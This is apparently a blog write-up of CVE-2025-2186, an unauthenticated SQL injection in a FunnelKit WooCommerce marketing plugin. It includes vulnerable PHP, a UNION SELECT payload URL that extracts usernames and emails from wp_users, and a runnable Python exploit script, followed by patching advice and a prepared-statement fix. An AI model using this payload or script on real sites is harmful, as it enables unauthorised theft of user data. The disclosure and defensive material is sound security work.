A high-risk vulnerability, CVE-2025-2186, was identified in the popular FunnelKit plugin for WordPress, specifically in the Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation module. This flaw affects all versions up to and including 3.5.1. By exploiting a lack of proper validation in the automationId parameter, unauthenticated attackers can execute malicious SQL queries on vulnerable sites. Here, we’ll break down how the bug works, show a demonstration, and discuss how to stay protected.
What’s the Problem?
The vulnerable plugin is widely used to automate email marketing for WooCommerce stores. Unfortunately, it mishandles user input in the automationId parameter, directly inserting it into SQL queries without adequate escaping or parameterization. This means attackers can inject raw SQL—opening the door to extracting sensitive info like usernames, email addresses, and hashed passwords from the site database.
How Does the Exploit Work?
When a feature in the plugin receives a request (usually via AJAX or REST), it expects an automationId parameter. In vulnerable versions, the plugin puts this parameter straight into an SQL statement, something like:
$automationId = $_GET['automationId'];
$query = "SELECT * FROM {$wpdb->prefix}funnelkit_automations WHERE id = $automationId";
$results = $wpdb->get_results($query);
If an attacker sends
automationId=1 OR 1=1
The query becomes
SELECT * FROM wp_funnelkit_automations WHERE id = 1 OR 1=1;
This causes the query to return all rows, possibly leaking confidential automations details.
But it gets worse: with more advanced injections, attackers can union SELECT statements to extract arbitrary database info.
Example Exploit
Let’s say the attacker wants to steal admin usernames and email addresses. They could craft a URL like:
https://vuln-site.com/wp-admin/admin-ajax.php?action=fk_get_automation&automationId=1 UNION SELECT 1,user_login,user_email,4 FROM wp_users--
Note: The exact format of the query may depend on the database schema and plugin version.
The vulnerable code helps them union extra queries and dump the wp_users table info, all without needing to log in.
Here’s a simple Python snippet to launch an attack against a site running the vulnerable plugin
import requests
target_url = 'https://targetsite.com/wp-admin/admin-ajax.php';
payload = '1 UNION SELECT 1,user_login,user_email,4 FROM wp_users--'
params = {
'action': 'fk_get_automation',
'automationId': payload
}
resp = requests.get(target_url, params=params)
print(resp.text)
This will return the usernames and email addresses, in the AJAX response, from the site’s user table.
References and Advisories
- Wordfence: CVE-2025-2186 Security Advisory
- FunnelKit Plugin Page
- WPScan Vulnerability Database
How to Stay Safe
1. Patch Immediately: Update FunnelKit to the latest version after 3.5.1, where proper validation and prepared statements are implemented.
Restrict access: Limit use of admin-ajax.php and shut down unnecessary endpoints.
4. Web Application Firewall: Use security plugins like Wordfence or Sucuri.
The plugin should use prepared statements to prevent this vulnerability. For example
$automationId = intval($_GET['automationId']);
$query = $wpdb->prepare("SELECT * FROM {$wpdb->prefix}funnelkit_automations WHERE id = %d", $automationId);
$results = $wpdb->get_results($query);
This makes sure that the user-supplied automationId is treated as an integer, not part of the SQL.
Final Thoughts
CVE-2025-2186 is a classic reminder that user input should never be trusted in web development. If you’re a WooCommerce store owner using this plugin, update now, audit your user list for suspicious accounts, and keep security top-of-mind. For attackers, exploitation is trivial, so don’t take chances.
Timeline
Published on: 03/22/2025 13:15:35 UTC